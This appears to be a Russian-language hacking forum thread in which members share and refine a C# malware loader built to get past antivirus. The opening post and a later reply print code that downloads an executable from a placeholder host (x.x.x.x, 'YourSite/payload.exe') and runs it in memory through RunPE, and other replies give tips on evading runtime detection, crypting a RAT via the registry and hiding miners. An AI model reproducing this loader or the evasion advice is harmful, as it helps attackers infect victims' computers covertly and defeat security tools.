Детекты : https://www.virustotal.com/gui/file...19e2660c900821e526b7599b4dcbc587fae/detection (Залил на Вт так как тестовый и напсаный за 15 минут ) Сам пиздец как такое сделать . Суете RunPe любой даже заезжанный .. Скачиваете через дефолтные библы от студийки У меня получилось примерно вот так WebClient webClient = new WebClient(); webClient.DownloadFile("http://x.x.x.x/test.exe", Environment.GetEnvironmentVariable("Temp") + "\\x.x.x.x.exe"); Thread.Sleep(8000); byte[] payload = File.ReadAllBytes(Environment.GetEnvironmentVariable("Temp") +"\\test.exe"); string filevar = "x.x.x.x.x"; RunMax.Run(payload, filevar); }р Все у вас готовы Downloader(Лоадер) с 0 детектами . ПОЖАЛУЙСТА ЕСЛИ ВЫ БУДЕТЕ ИСПОЛЬЗОВАТЬ СБОРКУ ОДНИМ ФАЙЛОМ(DONTET,CODEBOOM,MSBUILD) ЖДИТЕ ДЕТЕКТОВ . ЛИБО СУЙТЕ НОРМ МАНИФЕСТ Так же я понимаю , что это настоящий быдлокодинг , без вызова какой то хуйни. НО ЭТО ПРОСТО ПРИМЕР НАПИСАНЫЙ ЗА 15 МИНУТ
Где ссылка на пример? Нахуя нам ссылка на вирус тотал без доказательств что это детект этой программы
TheWall_inactive2650523, WriteProcessMemory детектится на рантайме. Брал сабку на динчике. Скантайм фуд, море джанкода, трешгена, нотки полиморфизма и наследования, а по итогу рантайм из под шарпа хуйня, тк вызовы kernel32 и ntdll сами по себе чекаются вендерами, за счёт чего и детектится. Можно реализовать через делегаты, но оно всё равно ровным счётом ничего не изменит. Даже если ты сделаешь компиляцию кода на лету в рантайме, оно удержит онли скантайм.
TheWall_inactive2650523, это если ты ебошиш дефолт динамику . Даже чекни на легальной программе , тот же самый алгоритм дейкстра через codeboom прогани он тебе даст от касперского детект. Если даже через публикацию dotnet сделаешь , будут детекты . Вот что становиться если юзать онли все в компиле . Мы с CodeVir смоковали эту тему вот что в выходе , 1 детект из за того что у меня компилятор стоял в свойствах unsafe По названиям можешь глянуть . И по времени . Что это все тоже самое .
дам вам идею для ратника чтобы криптануть, создаете лоадер RunPe который будет брать код из реестра и создаем ****пер который по пути реестра будет сохранять код то есть массив байтов ****пер будет палиться за то лоадер нет, понимаю примитивно но способ довольно таки рабочий. The post was merged to previous Oct 9, 2021 так на много легче и без загрузки в темп) using (WebClient wc = new WebClient()) { try { byte[] buffer = wc.DownloadData("http://YourSite/payload.exe"); RunMax.Run(buffer, "x.x.x.x"); } catch { } } C# using (WebClient wc = new WebClient()) { try { byte[] buffer = wc.DownloadData("http://YourSite/payload.exe"); RunMax.Run(buffer, "x.x.x.x"); } catch { } }
Lytik_inactive4477619, самое страшное для юзера в ран пе это системные прерывания хахаха, всегда про них шутил (скрытый майнер)
Dead__Artis, самое страшное для юза если суешь в regAsm и в процах можно просмотреть . Процесс приостановлен xD
Ебанулся, мне этот же код пол года назад выдавал 2-3 детекта , учитывая файлообменник( 2 детекта за счёт кода, если юзать гд с запароленым архивом )
mikuzeboka, хуй знает хуй знает 2 день на вт лежит поебать. Как то похуй . Могу скинуть еxe запустишь тестанешь по рантайму X)